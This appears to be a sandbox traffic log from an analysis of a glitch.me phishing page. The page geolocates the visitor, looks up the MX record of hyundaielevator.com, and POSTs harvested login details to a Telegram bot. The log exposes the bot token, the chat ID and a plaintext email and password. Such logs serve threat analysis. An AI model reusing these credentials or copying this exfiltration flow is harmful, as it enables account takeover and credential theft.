                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:18 UTC577OUTGET /json HTTP/1.1
                                                          Host: ipinfo.io
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:18 UTC345INHTTP/1.1 200 OK
                                                          access-control-allow-origin: *
                                                          Content-Length: 321
                                                          content-type: application/json; charset=utf-8
                                                          date: Tue, 03 Dec 2024 02:27:18 GMT
                                                          x-content-type-options: nosniff
                                                          via: 1.1 google
                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-03 02:27:18 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.4497678.8.8.8443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:20 UTC614OUTGET /resolve?name=hyundaielevator.com&type=MX HTTP/1.1
                                                          Host: dns.google
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:20 UTC548INHTTP/1.1 200 OK
                                                          X-Content-Type-Options: nosniff
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Date: Tue, 03 Dec 2024 02:27:20 GMT
                                                          Expires: Tue, 03 Dec 2024 02:27:20 GMT
                                                          Cache-Control: private, max-age=3600
                                                          Content-Type: application/json; charset=UTF-8
                                                          Server: HTTP server (unknown)
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2024-12-03 02:27:20 UTC278INData Raw: 31 30 66 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 33 36 30 30 2c 22 64 61 74 61 22 3a 22 31 30 20 6d 61 69 6c 69 6e 2e 68 79 75 6e 64 61 69 67 72 6f 75 70 2e 63 6f 6d 2e 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 32 36 30 30
                                                          Data Ascii: 10f{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"hyundaielevator.com.","type":15}],"Answer":[{"name":"hyundaielevator.com.","type":15,"TTL":3600,"data":"10 mailin.hyundaigroup.com."}],"Comment":"Response from 2600
                                                          2024-12-03 02:27:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.44976834.117.59.81443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:20 UTC337OUTGET /json HTTP/1.1
                                                          Host: ipinfo.io
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:20 UTC345INHTTP/1.1 200 OK
                                                          access-control-allow-origin: *
                                                          Content-Length: 321
                                                          content-type: application/json; charset=utf-8
                                                          date: Tue, 03 Dec 2024 02:27:20 GMT
                                                          x-content-type-options: nosniff
                                                          via: 1.1 google
                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-03 02:27:20 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.4497698.8.8.8443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:22 UTC374OUTGET /resolve?name=hyundaielevator.com&type=MX HTTP/1.1
                                                          Host: dns.google
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:22 UTC548INHTTP/1.1 200 OK
                                                          X-Content-Type-Options: nosniff
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Date: Tue, 03 Dec 2024 02:27:22 GMT
                                                          Expires: Tue, 03 Dec 2024 02:27:22 GMT
                                                          Cache-Control: private, max-age=3600
                                                          Content-Type: application/json; charset=UTF-8
                                                          Server: HTTP server (unknown)
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2024-12-03 02:27:22 UTC270INData Raw: 31 30 37 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 33 36 30 30 2c 22 64 61 74 61 22 3a 22 31 30 20 6d 61 69 6c 69 6e 2e 68 79 75 6e 64 61 69 67 72 6f 75 70 2e 63 6f 6d 2e 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 32 30 35 2e
                                                          Data Ascii: 107{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"hyundaielevator.com.","type":15}],"Answer":[{"name":"hyundaielevator.com.","type":15,"TTL":3600,"data":"10 mailin.hyundaigroup.com."}],"Comment":"Response from 205.
                                                          2024-12-03 02:27:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.449770149.154.167.220443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:22 UTC770OUTPOST /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: keep-alive
                                                          Content-Length: 655
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:22 UTC655OUTData Raw: 63 68 61 74 5f 69 64 3d 31 37 33 39 32 36 39 34 33 34 26 74 65 78 74 3d 2d 2d 2d 2d 2d 2d 2d 2d 25 32 42 2b 4b 49 54 41 2b 52 65 5a 75 6c 54 2b 4e 65 77 2b 59 6f 72 6b 2b 43 69 74 79 2b 4e 65 77 2b 59 6f 72 6b 25 32 43 2b 55 53 2b 25 32 42 2d 2d 2d 2d 2d 2d 2d 2d 25 30 41 45 6d 61 69 6c 2b 25 33 41 2b 74 61 65 6b 79 75 2e 6b 69 6d 25 34 30 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 25 30 41 50 61 73 73 77 6f 72 64 2b 25 33 41 2b 51 47 65 41 2e 21 6d 5a 59 71 4d 25 34 30 25 30 41 43 68 65 63 6b 65 72 25 33 41 2b 74 61 65 6b 79 75 2e 6b 69 6d 25 34 30 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 25 33 41 51 47 65 41 2e 21 6d 5a 59 71 4d 25 34 30 25 30 41 42 72 6f 77 73 65 72 2b 25 33 41 2b 35 2e 30 2b 28 57 69 6e 64 6f 77 73 2b 4e
                                                          Data Ascii: chat_id=1739269434&text=--------%2B+KITA+ReZulT+New+York+City+New+York%2C+US+%2B--------%0AEmail+%3A+taekyu.kim%40hyundaielevator.com%0APassword+%3A+QGeA.!mZYqM%40%0AChecker%3A+taekyu.kim%40hyundaielevator.com%3AQGeA.!mZYqM%40%0ABrowser+%3A+5.0+(Windows+N
                                                          2024-12-03 02:27:22 UTC389INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 03 Dec 2024 02:27:22 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 1030
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-12-03 02:27:22 UTC1030INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 33 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 35 31 33 30 38 31 33 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 67 62 69 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 70 69 73 61 70 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 33 39 32 36 39 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6f 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 5f 6d 6f 6f 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 31 39 32 38 34 32 2c 22 74 65 78 74 22 3a 22 2d 2d 2d
                                                          Data Ascii: {"ok":true,"result":{"message_id":19361,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1733192842,"text":"---


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.449771149.154.167.220443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:24 UTC401OUTGET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:25 UTC346INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 03 Dec 2024 02:27:24 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 80
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-12-03 02:27:25 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                          Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.44977234.117.59.81443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:38 UTC577OUTGET /json HTTP/1.1
                                                          Host: ipinfo.io
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:39 UTC345INHTTP/1.1 200 OK
                                                          access-control-allow-origin: *
                                                          Content-Length: 321
                                                          content-type: application/json; charset=utf-8
                                                          date: Tue, 03 Dec 2024 02:27:39 GMT
                                                          x-content-type-options: nosniff
                                                          via: 1.1 google
                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-03 02:27:39 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.44977320.109.210.53443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:40 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Nr3vsNvaxdKO489&MD=EY85S9GC HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                          Host: slscr.update.microsoft.com
                                                          2024-12-03 02:27:41 UTC560INHTTP/1.1 200 OK
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Content-Type: application/octet-stream
                                                          Expires: -1
                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                          MS-CorrelationId: 1ce70f7c-5062-4a7d-b082-4e857f1d7aa8
                                                          MS-RequestId: 4953e9be-74e4-4392-938e-adf94ccf21ec
                                                          MS-CV: PtfgshUfAU+bGZft.0
                                                          X-Microsoft-SLSClientCache: 1440
                                                          Content-Disposition: attachment; filename=environment.cab
                                                          X-Content-Type-Options: nosniff
                                                          Date: Tue, 03 Dec 2024 02:27:40 GMT
                                                          Connection: close
                                                          Content-Length: 30005
                                                          2024-12-03 02:27:41 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                          2024-12-03 02:27:41 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.44977634.117.59.81443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:40 UTC337OUTGET /json HTTP/1.1
                                                          Host: ipinfo.io
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:41 UTC345INHTTP/1.1 200 OK
                                                          access-control-allow-origin: *
                                                          Content-Length: 321
                                                          content-type: application/json; charset=utf-8
                                                          date: Tue, 03 Dec 2024 02:27:41 GMT
                                                          x-content-type-options: nosniff
                                                          via: 1.1 google
                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-03 02:27:41 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                          Data Ascii: { "ip": "8.46.123.228", "hostname": "static-cpe-8-46-123-228.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.449775149.154.167.220443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:40 UTC770OUTPOST /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: keep-alive
                                                          Content-Length: 681
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
